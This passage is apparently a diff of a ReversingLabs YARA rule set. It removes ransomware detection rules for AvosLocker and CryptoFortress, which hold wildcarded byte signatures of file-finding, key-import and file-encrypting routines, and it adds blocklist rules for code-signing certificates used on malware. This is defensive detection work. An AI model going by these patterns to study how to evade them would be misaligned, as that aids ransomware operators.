-            ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            33 D2 8B 45 ?? 8B 08 FF 51 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59
-            64 89 10 EB ?? E9 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
-        }
-		$encrypt_files_p2 = {
-            64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ??
-            0F 8E ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB
-            ?? 7E ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ??
-            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA
-        }
-		$encrypt_files_p3 = {
-            E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            EB ?? 8D 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B
-            08 FF 51 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ??
-            E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ??
-            ?? ?? 59 EB ?? 55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C.W.D. INSTAL LTD" and pe.signatures [ i ] . serial == "26:42:fe:86:5f:75:66:ce:31:23:a5:14:2c:20:70:94" and 1666310400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Avoslocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AvosLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a803283d-6424-5a64-89e6-c73a3322ba1e"
-		date = "2021-10-22"
-		modified = "2021-10-22"
+		id = "e5cae614-eff1-5c3d-a7f6-c41b0a2c412e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.AvosLocker.yara#L1-L108"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4d81b801a95a54a35989c4a985d92578971568d1412f625bca911d0fa1eee1fe"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11104-L11120"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bc2df95ddf1ef3d5f83d14852e1cf6cbf4b71bfbe88fc97c2a4553e8581ddf47"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "AvosLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF
-            B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89
-            9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9
-            ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
-            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15
-        }
-		$enum_resources = {
-            50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 57
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 33 DB 39 5D ?? 76 ?? 8D 77 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7E
-            ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 39 46 ?? B9 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 8B D1 0F 45 56 ?? 8B C1 83
-            7E ?? ?? 0F 11 85 ?? ?? ?? ?? 0F 45 46 ?? 83 3E ?? 0F 28 05 ?? ?? ?? ?? 89 45 ?? 8B
-            C1 0F 45 06 83 7E ?? ?? 0F 11 45 ?? 89 45 ?? 8B C1 0F 28 05 ?? ?? ?? ?? 0F 45 46 ??
-            33 C9 0F 11 45 ?? 89 45 ?? 0F 28 05 ?? ?? ?? ?? 0F 11 45 ?? 8A 85 ?? ?? ?? ?? 30 84
-            0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 52 FF 75 ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? FF 75 ??
-            FF 75 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3E ?? 0F 84 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ??
-            59 83 F8 ?? 0F 86 ?? ?? ?? ?? 8B 06 80 78 ?? ?? 75 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 33 C0 66 C7 45 ?? ?? ?? C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ??
-            8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 FF 36 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 65 ?? ?? 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ??
-            C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 83 4D ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? EB ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ??
-            C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8
-            ?? ?? ?? ?? 59 F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5D
-            ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15
-        }
-		$import_key = {
-            50 53 53 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? FF D6 50 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B1 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 30 8C 05 ?? ??
-            ?? ?? 40 83 F8 ?? 73 ?? 8A 8D ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 59 0F 11 85 ?? ?? ?? ??
-            59 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 88 9D
-            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 88 9D ?? ?? ??
-            ?? FF D6 50 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 36 8D 45 ?? 89 9D ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? FF 76 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 83 C4 ?? 8B D7 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            84 C0 75 ?? 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7
-            85 ?? ?? ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83
-            F9 ?? 72 ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 50 E8
-            ?? ?? ?? ?? 59 8D 4D ?? 85 C0 74 ?? 88 19 41 83 E8 ?? 75 ?? 39 9D ?? ?? ?? ?? 74 ??
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8
-        }
-		$encrypt_files = {
-            50 51 51 FF B5 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B BD ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CE 85 C0 74 ?? C6 01 ?? 41 83 E8 ?? 75 ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 59 83 C0 ?? 74 ?? 39 85 ?? ?? ?? ?? 72 ?? 50 8D 85 ?? ?? ??
-            ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83
-            C4 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 59 57 40 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 6A ?? FF B5 ?? ?? ?? ?? 6A
-            ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? D1 EF 6A ?? 5A 74 ??
-            8B 9D ?? ?? ?? ?? 4B 03 DE 8A 03 8A 0C 32 88 04 32 42 88 0B 4B 3B D7 72 ?? 8B 9D ??
-            ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 03 C3 56 50 E8 ?? ?? ?? ?? 03 DF 56
-            89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 47 81 C6 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2
-            B9 ?? ?? ?? ?? F7 F1 83 C4 ?? 40 3B F8 0F 82
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karolina Klimowska" and pe.signatures [ i ] . serial == "4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" and 1660314070 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cryptofortress : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoFortress ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "460289b1-f775-5e0b-8c44-4f6e5c92da60"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "bc37efaa-9ceb-5079-999f-b3d17c585b1c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.CryptoFortress.yara#L1-L162"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "474893b63523de5ff9eb8a0c91b0677b99ce65056af7f5d02a73e43fa65453c9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11122-L11140"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2a0be6157e589705ad19756971bd865edad2d54760d03c2e6f47a461b402ad68"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoFortress"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_drives = {
-            55 8B EC 83 C4 ?? 56 57 C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 8D 7D ?? B2 ?? B9 ?? ?? ?? ?? A9 ?? ?? ?? ?? 74 ?? 88 17 47 D1 E8 FE C2 49
-            75 ?? C6 07 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F8 8D 75 ?? 8A 16 88 55 ?? 8D 45 ?? 50
-            FF 15 ?? ?? ?? ?? 8D 55 ?? C6 42 ?? ?? 83 F8 ?? 75 ?? 60 8D 45 ?? 50 8D 45 ?? 50 6A
-            ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 61 46 4F 75 ?? A1 ?? ?? ?? ?? A3
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 5F 5E C9 C3
-        }
-		$enum_shared_resources = {
-            55 8B EC 83 C4 ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 0B C0 0F
-            85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 8D 45 ?? 50 FF 75 ?? FF 15
-            ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 3D ?? ?? ?? ?? 74 ?? 8B 4D ?? 51 8D 49 ?? 6B C9 ?? 8B
-            45 ?? 8D 0C 01 6A ?? 51 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? FF 75 ?? E8 ??
-            ?? ?? ?? 83 F8 ?? 76 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            0B C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 49 75 ?? EB
-            ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? C9 C2
-        }
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 40 0F 84 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? C6 00 ?? 2B 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? C7 04 08 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 8B 8D ?? ?? ?? ?? C7 44 08 ??
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 45 ??
-            8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 49 8B 1D ?? ?? ?? ?? 51 53
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8
-            83 C3 ?? 59 E2 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 0B
-            C9 75 ?? 3B D0 72 ?? EB ?? EB ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 33 C0 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89
-            45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? FF 35 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 50 50 6A ?? 50 6A ?? 68 ?? ?? ?? ??
-            FF 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8D 45
-            ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            83 7D ?? ?? 75 ?? 83 7D ?? ?? 73 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B D2 75 ?? 0B C9 75 ?? B9 ?? ?? ?? ?? 89 4D ?? 89 55 ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 89 55 ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 4D ?? 89 55 ?? 0B DB 75 ?? 0B C0 74 ?? 83 45 ?? ?? 83 55 ?? ?? FF 75 ??
-            FF 75 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ??
-            ?? ?? 76 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 6B C0 ?? 89 45 ?? 6A ?? 8D 45 ?? 50 FF 75
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ??
